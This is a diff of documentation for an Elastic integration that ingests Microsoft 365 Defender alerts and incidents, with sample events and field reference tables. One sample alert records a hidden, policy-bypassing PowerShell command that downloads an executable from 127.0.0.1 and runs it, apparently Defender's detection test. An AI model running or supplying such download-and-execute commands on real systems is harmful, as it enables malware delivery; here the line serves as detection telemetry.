submitting any suspect files in the chain for deep analysis for detailed behavior information.", + "service_source": "microsoftDefenderForEndpoint", + "severity": "medium", + "status": "new", + "tenant_id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "title": "Suspicious PowerShell command line", + "web_url": { + "domain": "security.microsoft.com", + "original": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "path": "/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "scheme": "https" + } + } + }, + "message": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "process": { + "command_line": [ + "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'" + ], + "hash": { + "sha1": [ + "a72c41316307889e43fe8605a0dca4a72e72a011" + ], + "sha256": [ + "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80" + ] + }, + "parent": { + "pid": [ + 5772 + ], + "start": [ + "2023-10-20T09:51:19.506Z" + ] + }, + "pid": [ + 8224 + ], + "start": [ + "2023-10-20T09:51:39.499Z" + ], + "user": { + "name": [ + "CDPUserIS-38411" + ] + } + }, + "related": { + "hash": [ + "a72c41316307889e43fe8605a0dca4a72e72a011", + "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80" + ], + "hosts": [ + "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "Windows11", + "22H2", + "clw555test", + "AzureAD" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "CDPUserIS-38411", + "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields", + "forwarded", + "m365_defender-alert" + ], + "threat": { + "tactic": { + "name": [ + "Execution" + ] + }, + "technique": { + "subtechnique": { + "id": [ + "T1059.001" + ] + } + } + }, + "user": { + "domain": [ + "AzureAD" + ], + "name": [ + "CDPUserIS-38411" + ] + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| event.dataset | Event dataset. | constant_keyword | +| event.module | Event module. | constant_keyword | +| input.type | Type of filebeat input. | keyword | +| log.offset | Log offset. | long | +| m365_defender.alert.actor_display_name | The adversary or activity group that is associated with this alert. | keyword | +| m365_defender.alert.assigned_to | Owner of the alert, or null if no owner is assigned. | keyword | +| m365_defender.alert.category | The attack kill-chain category that the alert belongs to. Aligned with the MITRE ATT&CK framework. | keyword | +| m365_defender.alert.classification | Specifies whether the alert represents a true threat. Possible values are: unknown, falsePositive, truePositive, benignPositive, unknownFutureValue. | keyword | +| m365_defender.alert.comments | Array of comments created by the Security Operations (SecOps) team during the alert management process. | flattened | +| m365_defender.alert.created_datetime | Time when Microsoft 365 Defender created the alert. | date | +| m365_defender.alert.description | String value describing each alert. | keyword | +| m365_defender.alert.detection_source | Detection technology or sensor that identified the notable component or activity. | keyword | +| m365_defender.alert.detector_id | The ID of the detector that triggered the alert. | keyword | +| m365_defender.alert.determination | Specifies the result of the investigation, whether the alert represents a true attack and if so, the nature of the attack. Possible values are: unknown, apt, malware, securityPersonnel, securityTesting, unwantedSoftware, other, multiStagedAttack, compromisedUser, phishing, maliciousUserActivity, clean, insufficientData, confirmedUserActivity, lineOfBusinessApplication, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.antispam_direction | Direction of the email relative to your network. The possible values are: Inbound, Outbound or Intraorg. | keyword | +| m365_defender.alert.evidence.app_id | Unique identifier of the application. | keyword | +| m365_defender.alert.evidence.attachments_count | Number of attachments in the email. | long | +| m365_defender.alert.evidence.azure_ad_device_id | A unique identifier assigned to a device by Azure Active Directory (Azure AD) when device is Azure AD-joined. | keyword | +| m365_defender.alert.evidence.cluster_by | The clustering logic of the emails inside the cluster. | keyword | +| m365_defender.alert.evidence.cluster_by_value | The value utilized to cluster the similar emails. | keyword | +| m365_defender.alert.evidence.created_datetime | The time the evidence was created and added to the alert. | date | +| m365_defender.alert.evidence.defender_av_status | State of the Defender AntiMalware engine. The possible values are: notReporting, disabled, notUpdated, updated, unknown, notSupported, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.delivery_action | Delivery action of the email. The possible values are: Delivered, DeliveredAsSpam, Junked, Blocked, or Replaced. | keyword | +| m365_defender.alert.evidence.delivery_location | Location where the email was delivered. The possible values are: Inbox, External, JunkFolder, Quarantine, Failed, Dropped, DeletedFolder or Forwarded. | keyword | +| m365_defender.alert.evidence.detailed_roles | Detailed roles of the user associated with the event. | keyword | +| m365_defender.alert.evidence.detection_status | The status of the detection.The possible values are: detected, blocked, prevented, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.device_dns_name | The fully qualified domain name (FQDN) for the device. | keyword | +| m365_defender.alert.evidence.display_name | Name of the application. | keyword | +| m365_defender.alert.evidence.email_count | Count of emails in the email cluster. | long | +| m365_defender.alert.evidence.file_details.issuer | The certificate authority (CA) that issued the certificate. | keyword | +| m365_defender.alert.evidence.file_details.name | The name of the file. | keyword | +| m365_defender.alert.evidence.file_details.odata_type | | keyword | +| m365_defender.alert.evidence.file_details.path | The file path (location) of the file instance. | keyword | +| m365_defender.alert.evidence.file_details.publisher | The publisher of the file. | keyword | +| m365_defender.alert.evidence.file_details.sha1 | The Sha1 cryptographic hash of the file content. | keyword | +| m365_defender.alert.evidence.file_details.sha256 | The Sha256 cryptographic hash of the file content. | keyword | +| m365_defender.alert.evidence.file_details.signer | The signer of the signed file. | keyword | +| m365_defender.alert.evidence.file_details.size | The size of the file in bytes. | long | +| m365_defender.alert.evidence.first_seen_datetime | The date and time when the device was first seen. | date | +| m365_defender.alert.evidence.health_status | The health state of the device.The possible values are: active, inactive, impairedCommunication, noSensorData, noSensorDataImpairedCommunication, unknown, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.image_file.issuer | The certificate authority (CA) that issued the certificate. | keyword | +| m365_defender.alert.evidence.image_file.name | The name of the file. | keyword | +| m365_defender.alert.evidence.image_file.odata_type | | keyword | +| m365_defender.alert.evidence.image_file.path | The file path (location) of the file instance. | keyword | +| m365_defender.alert.evidence.image_file.publisher | The publisher of the file. | keyword | +| m365_defender.alert.evidence.image_file.sha1 | The Sha1 cryptographic hash of the file content. | keyword | +| m365_defender.alert.evidence.image_file.sha256 | The Sha256 cryptographic hash of the file content. | keyword | +| m365_defender.alert.evidence.image_file.signer | The signer of the signed file. | keyword | +| m365_defender.alert.evidence.image_file.size | The size of the file in bytes. | long | +| m365_defender.alert.evidence.instance_id | Identifier of the instance of the Software as a Service (SaaS) application. | keyword | +| m365_defender.alert.evidence.instance_name | Name of the instance of the SaaS application. | keyword | +| m365_defender.alert.evidence.internet_message_id | Public-facing identifier for the email that is set by the sending email system. | keyword | +| m365_defender.alert.evidence.ip_address | The value of the IP Address, can be either in V4 address or V6 address format. | ip | +| m365_defender.alert.evidence.ip_interfaces | IP Interfaces related to the event. | ip | +| m365_defender.alert.evidence.language | Detected language of the email content. | keyword | +| m365_defender.alert.evidence.logged_on_users.account_name | User account name of the logged-on user. | keyword | +| m365_defender.alert.evidence.logged_on_users.domain_name | User account domain of the logged-on user. | keyword | +| m365_defender.alert.evidence.logged_on_users.odata_type | | keyword | +| m365_defender.alert.evidence.mde_device_id | A unique identifier assigned to a device by Microsoft Defender for Endpoint. | keyword | +| m365_defender.alert.evidence.network_message_id | Unique identifier for the email, generated by Microsoft 365. | keyword | +| m365_defender.alert.evidence.network_message_ids | Unique identifiers for the emails in the cluster, generated by Microsoft 365. | keyword | +| m365_defender.alert.evidence.object_id | The unique identifier of the application object in Azure AD. | keyword | +| m365_defender.alert.evidence.odata_type | | keyword | +| m365_defender.alert.evidence.onboarding_status | The status of the machine onboarding to Microsoft Defender for Endpoint.The possible values are: insufficientInfo, onboarded, canBeOnboarded, unsupported, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.os_build | The build version for the operating system the device is running. | keyword | +| m365_defender.alert.evidence.os_platform | The operating system platform the device is running. | keyword | +| m365_defender.alert.evidence.p1_sender.display_name | The name of the sender. | keyword | +| m365_defender.alert.evidence.p1_sender.domain_name | Sender domain. | keyword | +| m365_defender.alert.evidence.p1_sender.email_address | Sender email address. | keyword | +| m365_defender.alert.evidence.p1_sender.odata_type | | keyword | +| m365_defender.alert.evidence.p2_sender.display_name | The name of the sender. | keyword | +| m365_defender.alert.evidence.p2_sender.domain_name | Sender domain. | keyword | +| m365_defender.alert.evidence.p2_sender.email_address | Sender email address. | keyword | +| m365_defender.alert.evidence.p2_sender.odata_type | | keyword | +| m365_defender.alert.evidence.parent_process.creation_datetime | Date and time when the parent of the process was created. | date | +| m365_defender.alert.evidence.parent_process.id | Process ID (PID) of the parent process that spawned the process. | long | +| m365_defender.alert.evidence.parent_process.image_file.issuer | The certificate authority (CA) that issued the certificate. | keyword | +| m365_defender.alert.evidence.parent_process.image_file.name | The name of the file. | keyword | +| m365_defender.alert.evidence.parent_process.image_file.odata_type | | keyword | +| m365_defender.alert.evidence.parent_process.image_file.path | The file path (location) of the file instance. | keyword | +| m365_defender.alert.evidence.parent_process.image_file.publisher | The publisher of the file. | keyword | +| m365_defender.alert.evidence.parent_process.image_file.sha1 | The Sha1 cryptographic hash of the file content. | keyword | +| m365_defender.alert.evidence.parent_process.image_file.sha256 | The Sha256 cryptographic hash of the file content. | keyword | +| m365_defender.alert.evidence.parent_process.image_file.signer | The signer of the signed file. | keyword | +| m365_defender.alert.evidence.parent_process.image_file.size | The size of the file in bytes. | long | +| m365_defender.alert.evidence.primary_address | The primary email address of the mailbox. | keyword | +| m365_defender.alert.evidence.process.command_line | Command line used to create the new process. | keyword | +| m365_defender.alert.evidence.process.creation_datetime | Date and time the process was created. | date | +| m365_defender.alert.evidence.process.id | Process ID (PID) of the newly created process. | long | +| m365_defender.alert.evidence.publisher | The name of the application publisher. | keyword | +| m365_defender.alert.evidence.query | The query used to identify the email cluster. | keyword | +| m365_defender.alert.evidence.rbac_group.id | The ID of the role-based access control (RBAC) device group. | keyword | +| m365_defender.alert.evidence.rbac_group.name | The name of the RBAC device group. | keyword | +| m365_defender.alert.evidence.received_datetime | Date and time when the email was received. | date | +| m365_defender.alert.evidence.recipient_email_address | Email address of the recipient, or email address of the recipient after distribution list expansion. | keyword | +| m365_defender.alert.evidence.registry_hive | Registry hive of the key that the recorded action was applied to. | keyword | +| m365_defender.alert.evidence.registry_key | Registry key that the recorded action was applied to. | keyword | +| m365_defender.alert.evidence.registry_value | Data of the registry value that the recorded action was applied to. | keyword | +| m365_defender.alert.evidence.registry_value_name | Name of the registry value that the recorded action was applied to. | keyword | +| m365_defender.alert.evidence.registry_value_type | Data type, such as binary or string, of the registry value that the recorded action was applied to. | keyword | +| m365_defender.alert.evidence.remediation_status | Status of the remediation action taken. The possible values are: none, remediated, prevented, blocked, notFound, active, pendingApproval, declined, notRemediated, running, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.remediation_status_details | Details about the remediation status. | keyword | +| m365_defender.alert.evidence.risk_score | Risk score as evaluated by Microsoft Defender for Endpoint. The possible values are: none, informational, low, medium, high, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.roles | The role/s that an evidence entity represents in an alert, e.g., an IP address that is associated with an attacker will have the evidence role "Attacker". | keyword | +| m365_defender.alert.evidence.saas_app_id | The identifier of the SaaS application. | keyword | +| m365_defender.alert.evidence.security_group_id | Unique identifier of the security group. | keyword | +| m365_defender.alert.evidence.sender_ip | IP address of the last detected mail server that relayed the message. | ip | +| m365_defender.alert.evidence.subject | Subject of the email. | keyword | +| m365_defender.alert.evidence.tags | Array of custom tags associated with an evidence instance, for example to denote a group of devices, high value assets, etc. | keyword | +| m365_defender.alert.evidence.threat_detection_methods | Collection of methods used to detect malware, phishing, or other threats found in the email. | keyword | +| m365_defender.alert.evidence.threats | Collection of detection names for malware or other threats found. | keyword | +| m365_defender.alert.evidence.type | | keyword | +| m365_defender.alert.evidence.url | The Unique Resource Locator (URL). | keyword | +| m365_defender.alert.evidence.url_count | Number of embedded URLs in the email. | long | +| m365_defender.alert.evidence.urls | Collection of the URLs contained in this email. | keyword | +| m365_defender.alert.evidence.urn | Uniform resource name (URN) of the automated investigation where the cluster was identified. | keyword | +| m365_defender.alert.evidence.user_account.account_name | The user account's displayed name. | keyword | +| m365_defender.alert.evidence.user_account.azure_ad_user_id | The user object identifier in Azure AD. | keyword | +| m365_defender.alert.evidence.user_account.domain_name | The name of the Active Directory domain of which the user is a member. | keyword | +| m365_defender.alert.evidence.user_account.odata_type | | keyword | +| m365_defender.alert.evidence.user_account.user_principal_name | The user principal name of the account in Azure AD. | keyword | +| m365_defender.alert.evidence.user_account.user_sid | The local security identifier of the user account. | keyword | +| m365_defender.alert.evidence.verdict | The decision reached by automated investigation. The possible values are: unknown, suspicious, malicious, noThreatsFound, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.version | The version of the operating system platform. | keyword | +| m365_defender.alert.evidence.vm_metadata.cloud_provider | The cloud provider hosting the virtual machine. The possible values are: unknown, azure, unknownFutureValue. | keyword | +| m365_defender.alert.evidence.vm_metadata.odata_type | | keyword | +| m365_defender.alert.evidence.vm_metadata.resource_id | Unique identifier of the Azure resource. | keyword | +| m365_defender.alert.evidence.vm_metadata.subscription_id | Unique identifier of the Azure subscription the customer tenant belongs to. | keyword | +| m365_defender.alert.evidence.vm_metadata.vm_id | Unique identifier of the virtual machine instance. | keyword | +| m365_defender.alert.first_activity_datetime | The earliest activity associated with the alert. | date | +| m365_defender.alert.id | Unique identifier to represent the alert resource. | keyword | +| m365_defender.alert.incident_id | Unique identifier to represent the incident this alert resource is associated with. | keyword | +| m365_defender.alert.incident_web_url.domain | | keyword | +| m365_defender.alert.incident_web_url.extension | | keyword | +| m365_defender.alert.incident_web_url.fragment | | keyword | +| m365_defender.alert.incident_web_url.full | | keyword | +| m365_defender.alert.incident_web_url.original | | keyword | +| m365_defender.alert.incident_web_url.password | | keyword | +| m365_defender.alert.incident_web_url.path | | keyword | +| m365_defender.alert.incident_web_url.port | | long | +| m365_defender.alert.incident_web_url.query | | keyword | +| m365_defender.alert.incident_web_url.scheme | | keyword | +| m365_defender.alert.incident_web_url.username | | keyword | +| m365_defender.alert.last_activity_datetime | The oldest activity associated with the alert. | date | +| m365_defender.alert.last_update_datetime | Time when the alert was last updated at Microsoft 365 Defender. | date | +| m365_defender.alert.mitre_techniques | The attack techniques, as aligned with the MITRE ATT&CK framework. | keyword | +| m365_defender.alert.odata_type | | keyword | +| m365_defender.alert.provider_alert_id | The ID of the alert as it appears in the security provider product that generated the alert. | keyword | +| m365_defender.alert.recommended_actions | Recommended response and remediation actions to take in the event this alert was generated. | keyword | +| m365_defender.alert.resolved_datetime | Time when the alert was resolved. | date | +| m365_defender.alert.service_source | The service or product that created this alert. Possible values are: microsoftDefenderForEndpoint, microsoftDefenderForIdentity, microsoftCloudAppSecurity, microsoftDefenderForOffice365, microsoft365Defender, aadIdentityProtection, appGovernance, dataLossPrevention. | keyword | +| m365_defender.alert.severity | Indicates the possible impact on assets. The higher the severity the bigger the impact. Typically higher severity items require the most immediate attention. Possible values are: unknown, informational, low, medium, high, unknownFutureValue. | keyword | +| m365_defender.alert.status | The status of the alert. Possible values are: new, inProgress, resolved, unknownFutureValue. | keyword | +| m365_defender.alert.tenant_id | The Azure Active Directory tenant the alert was created in. | keyword | +| m365_defender.alert.threat_display_name | The threat associated with this alert. | keyword | +| m365_defender.alert.threat_family_name | Threat family associated with this alert. | keyword | +| m365_defender.alert.title | Brief identifying string value describing the alert. | keyword | +| m365_defender.alert.web_url.domain | | keyword | +| m365_defender.alert.web_url.extension | | keyword | +| m365_defender.alert.web_url.fragment | | keyword | +| m365_defender.alert.web_url.full | | keyword | +| m365_defender.alert.web_url.original | | keyword | +| m365_defender.alert.web_url.password | | keyword | +| m365_defender.alert.web_url.path | | keyword | +| m365_defender.alert.web_url.port | | long | +| m365_defender.alert.web_url.query | | keyword | +| m365_defender.alert.web_url.scheme | | keyword | +| m365_defender.alert.web_url.username | | keyword | +| tags | User defined tags. | keyword | + + ### event This is the `event` dataset. @@ -547,11 +1030,11 @@ An example event for `incident` looks as following: { "@timestamp": "2021-09-30T09:35:45.113Z", "agent": { - "ephemeral_id": "bfa54030-e0ce-4076-86d5-90314cd5425d", - "id": "b749ee7f-378d-45d8-8151-975dfa11ce57", + "ephemeral_id": "b25e1419-d728-4361-8b2c-b147f421b7c9", + "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.8.2" + "version": "8.13.0" }, "cloud": { "account": { @@ -570,9 +1053,9 @@ An example event for `incident` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "b749ee7f-378d-45d8-8151-975dfa11ce57", - "snapshot": false, - "version": "8.8.2" + "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1", + "snapshot": true, + "version": "8.13.0" }, "event": { "action": [ @@ -582,7 +1065,7 @@ An example event for `incident` looks as following: "created": "2021-08-13T08:43:35.553Z", "dataset": "m365_defender.incident", "id": "2972395", - "ingested": "2023-07-21T12:35:09Z", + "ingested": "2024-01-17T16:05:30Z", "kind": "alert", "original": "{\"@odata.type\":\"#microsoft.graph.security.incident\",\"alerts\":{\"@odata.type\":\"#microsoft.graph.security.alert\",\"actorDisplayName\":null,\"alertWebUrl\":\"https://security.microsoft.com/alerts/da637551227677560813_-961444813?tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"assignedTo\":null,\"category\":\"DefenseEvasion\",\"classification\":\"unknown\",\"comments\":[],\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"description\":\"A hidden file has been launched. This activity could indicate a compromised host. Attackers often hide files associated with malicious tools to evade file system inspection and defenses.\",\"detectionSource\":\"antivirus\",\"detectorId\":\"e0da400f-affd-43ef-b1d5-afc2eb6f2756\",\"determination\":\"unknown\",\"evidence\":[{\"@odata.type\":\"#microsoft.graph.security.deviceEvidence\",\"azureAdDeviceId\":null,\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"defenderAvStatus\":\"unknown\",\"deviceDnsName\":\"tempDns\",\"firstSeenDateTime\":\"2020-09-12T07:28:32.4321753Z\",\"healthStatus\":\"active\",\"loggedOnUsers\":[],\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"onboardingStatus\":\"onboarded\",\"osBuild\":22424,\"osPlatform\":\"Windows10\",\"rbacGroupId\":75,\"rbacGroupName\":\"UnassignedGroup\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"riskScore\":\"medium\",\"roles\":[\"compromised\"],\"tags\":[\"Test Machine\"],\"verdict\":\"unknown\",\"version\":\"Other\",\"vmMetadata\":{\"cloudProvider\":\"azure\",\"resourceId\":\"/subscriptions/8700d3a3-3bb7-4fbe-a090-488a1ad04161/resourceGroups/WdatpApi-EUS-STG/providers/Microsoft.Compute/virtualMachines/NirLaviTests\",\"subscriptionId\":\"8700d3a3-3bb7-4fbe-a090-488a1ad04161\",\"vmId\":\"ca1b0d41-5a3b-4d95-b48b-f220aed11d78\"}},{\"@odata.type\":\"#microsoft.graph.security.fileEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"detectionStatus\":\"detected\",\"fileDetails\":{\"fileName\":\"MsSense.exe\",\"filePath\":\"C:\\\\Program Files\\\\temp\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":6136392,\"issuer\":null,\"sha1\":\"5f1e8acedc065031aad553b710838eb366cfee9a\",\"sha256\":\"8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec\",\"signer\":null},\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.processEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"detectionStatus\":\"detected\",\"imageFile\":{\"fileName\":\"MsSense.exe\",\"filePath\":\"C:\\\\Program Files\\\\temp\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":6136392,\"issuer\":null,\"sha1\":\"5f1e8acedc065031aad553b710838eb366cfee9a\",\"sha256\":\"8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec\",\"signer\":null},\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"parentProcessCreationDateTime\":\"2021-08-12T07:39:09.0909239Z\",\"parentProcessId\":668,\"parentProcessImageFile\":{\"fileName\":\"services.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":731744,\"issuer\":null,\"sha1\":null,\"sha256\":null,\"signer\":null},\"processCommandLine\":\"\\\"MsSense.exe\\\"\",\"processCreationDateTime\":\"2021-08-12T12:43:19.0772577Z\",\"processId\":4780,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"SYSTEM\",\"azureAdUserId\":null,\"domainName\":\"NT AUTHORITY\",\"userPrincipalName\":null,\"userSid\":\"S-1-5-18\"},\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.registryKeyEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"registryHive\":\"HKEY_LOCAL_MACHINE\",\"registryKey\":\"SYSTEM\\\\CONTROLSET001\\\\CONTROL\\\\WMI\\\\AUTOLOGGER\\\\SENSEAUDITLOGGER\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"unknown\"}],\"firstActivityDateTime\":\"2021-04-26T07:45:50.116Z\",\"id\":\"da637551227677560813_-961444813\",\"incidentId\":\"28282\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/28282?tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"lastActivityDateTime\":\"2021-05-02T07:56:58.222Z\",\"lastUpdateDateTime\":\"2021-05-02T14:19:01.3266667Z\",\"mitreTechniques\":[\"T1564.001\"],\"providerAlertId\":\"da637551227677560813_-961444813\",\"recommendedActions\":\"Collect artifacts and determine scope\\n�\\tReview the machine timeline for suspicious activities that may have occurred before and after the time of the alert, and record additional related artifacts (files, IPs/URLs) \\n�\\tLook for the presence of relevant artifacts on other systems. Identify commonalities and differences between potentially compromised systems.\\n�\\tSubmit relevant files for deep analysis and review resulting detailed behavioral information.\\n�\\tSubmit undetected files to the MMPC malware portal\\n\\nInitiate containment \\u0026 mitigation \\n�\\tContact the user to verify intent and initiate local remediation actions as needed.\\n�\\tUpdate AV signatures and run a full scan. The scan might reveal and remove previously-undetected malware components.\\n�\\tEnsure that the machine has the latest security updates. In particular, ensure that you have installed the latest software, web browser, and Operating System versions.\\n�\\tIf credential theft is suspected, reset all relevant users passwords.\\n�\\tBlock communication with relevant URLs or IPs at the organization�s perimeter.\",\"resolvedDateTime\":null,\"serviceSource\":\"microsoftDefenderForEndpoint\",\"severity\":\"low\",\"status\":\"new\",\"tenantId\":\"b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"threatDisplayName\":null,\"threatFamilyName\":null,\"title\":\"Suspicious execution of hidden file\"},\"assignedTo\":\"KaiC@contoso.onmicrosoft.com\",\"classification\":\"truePositive\",\"comments\":[{\"comment\":\"Demo incident\",\"createdBy\":\"DavidS@contoso.onmicrosoft.com\",\"createdTime\":\"2021-09-30T12:07:37.2756993Z\"}],\"createdDateTime\":\"2021-08-13T08:43:35.5533333Z\",\"determination\":\"multiStagedAttack\",\"displayName\":\"Multi-stage incident involving Initial access \\u0026 Command and control on multiple endpoints reported by multiple sources\",\"id\":\"2972395\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/2972395?tid=12f988bf-16f1-11af-11ab-1d7cd011db47\",\"lastUpdateDateTime\":\"2021-09-30T09:35:45.1133333Z\",\"redirectIncidentId\":null,\"severity\":\"medium\",\"status\":\"active\",\"tags\":[\"Demo\"],\"tenantId\":\"b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\"}", "provider": "microsoftDefenderForEndpoint", @@ -874,7 +1357,6 @@ An example event for `incident` looks as following: } } } - ``` **Exported fields** @@ -1011,6 +1493,7 @@ An example event for `incident` looks as following: | m365_defender.incident.alert.evidence.network_message_id | Unique identifier for the email, generated by Microsoft 365. | keyword | | m365_defender.incident.alert.evidence.network_message_ids | Unique identifiers for the emails in the cluster, generated by Microsoft 365. | keyword | | m365_defender.incident.alert.evidence.object_id | The unique identifier of the application object in Azure AD. | keyword | +| m365_defender.incident.alert.evidence.odata_type | | keyword | | m365_defender.incident.alert.evidence.onboarding_status | The status of the machine onboarding to Microsoft Defender for Endpoint.The possible values are: insufficientInfo, onboarded, canBeOnboarded, unsupported, unknownFutureValue. | keyword | | m365_defender.incident.alert.evidence.os_build | The build version for the operating system the device is running. | keyword | | m365_defender.incident.alert.evidence.os_platform | The operating system platform the device is running. | keyword | @@ -1066,6 +1549,7 @@ An example event for `incident` looks as following: | m365_defender.incident.alert.evidence.urn | Uniform resource name (URN) of the automated investigation where the cluster was identified. | keyword | | m365_defender.incident.alert.evidence.user_account.account_name | The user account's displayed name. | keyword | | m365_defender.incident.alert.evidence.user_account.azure_ad_user_id | The user object identifier in Azure AD. | keyword | +| m365_defender.incident.alert.evidence.user_account.display_name | The user display name in Azure AD. | keyword | | m365_defender.incident.alert.evidence.user_account.domain_name | The name of the Active Directory domain of which the user is a member. | keyword | | m365_defender.incident.alert.evidence.user_account.odata_type | | keyword | | m365_defender.incident.alert.evidence.user_account.user_principal_name | The user principal name of the account in Azure AD. | keyword | @@ -1176,11 +1660,11 @@ An example event for `log` looks as following: { "@timestamp": "2020-09-06T12:07:55.32Z", "agent": { - "ephemeral_id": "538b61a2-ee8e-4f0f-92b3-874bb25bd07c", - "id": "761cded5-abcb-4ec8-a5e6-f7546489e271", + "ephemeral_id": "75fd76e4-ea58-4f89-92b4-6d1acb0a10bb", + "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.13.0" }, "cloud": { "provider": "azure" @@ -1194,9 +1678,9 @@ An example event for `log` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "761cded5-abcb-4ec8-a5e6-f7546489e271", - "snapshot": false, - "version": "8.7.1" + "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1", + "snapshot": true, + "version": "8.13.0" }, "event": { "action": "InitialAccess", @@ -1209,7 +1693,7 @@ An example event for `log` looks as following: "duration": 0, "end": "2020-09-06T12:04:00Z", "id": "faf8edc936-85f8-a603-b800-08d8525cf099", - "ingested": "2023-08-08T07:59:58Z", + "ingested": "2024-01-17T16:06:28Z", "kind": "alert", "original": "{\"alerts\":{\"actorName\":null,\"alertId\":\"faf8edc936-85f8-a603-b800-08d8525cf099\",\"assignedTo\":\"Automation\",\"category\":\"InitialAccess\",\"classification\":null,\"creationTime\":\"2020-09-06T12:07:54.3716642Z\",\"description\":\"This alert is triggered when any email message is reported as malware or phish by users -V1.0.0.2\",\"detectionSource\":\"OfficeATP\",\"determination\":null,\"devices\":[],\"entities\":{\"aadUserId\":null,\"accountName\":null,\"clusterBy\":null,\"deliveryAction\":null,\"deviceId\":null,\"domainName\":null,\"entityType\":\"MailBox\",\"fileName\":null,\"filePath\":null,\"ipAddress\":null,\"mailboxAddress\":\"testUser3@contoso.com\",\"mailboxDisplayName\":\"test User3\",\"parentProcessCreationTime\":null,\"parentProcessId\":null,\"processCommandLine\":null,\"processCreationTime\":null,\"processId\":null,\"recipient\":null,\"registryHive\":null,\"registryKey\":null,\"registryValue\":null,\"registryValueType\":null,\"securityGroupId\":null,\"securityGroupName\":null,\"sender\":null,\"sha1\":null,\"sha256\":null,\"subject\":null,\"url\":null,\"userPrincipalName\":\"testUser3@contoso.com\",\"userSid\":null},\"firstActivity\":\"2020-09-06T12:04:00Z\",\"incidentId\":924518,\"investigationId\":null,\"investigationState\":\"Queued\",\"lastActivity\":\"2020-09-06T12:04:00Z\",\"lastUpdatedTime\":\"2020-09-06T12:37:40.88Z\",\"mitreTechniques\":[],\"resolvedTime\":null,\"serviceSource\":\"OfficeATP\",\"severity\":\"Informational\",\"status\":\"InProgress\",\"threatFamilyName\":null,\"title\":\"Email reported by user as malware or phish\"},\"assignedTo\":null,\"classification\":\"Unknown\",\"comments\":[],\"createdTime\":\"2020-09-06T12:07:55.1366667Z\",\"determination\":\"NotAvailable\",\"incidentId\":924518,\"incidentName\":\"Email reported by user as malware or phish\",\"lastUpdateTime\":\"2020-09-06T12:07:55.32Z\",\"redirectIncidentId\":null,\"severity\":\"Informational\",\"status\":\"Active\",\"tags\":[]}", "provider": "OfficeATP", @@ -1282,7 +1766,6 @@ An example event for `log` looks as following: "name": "testUser3@contoso.com" } } - ``` **Exported fields** diff --git 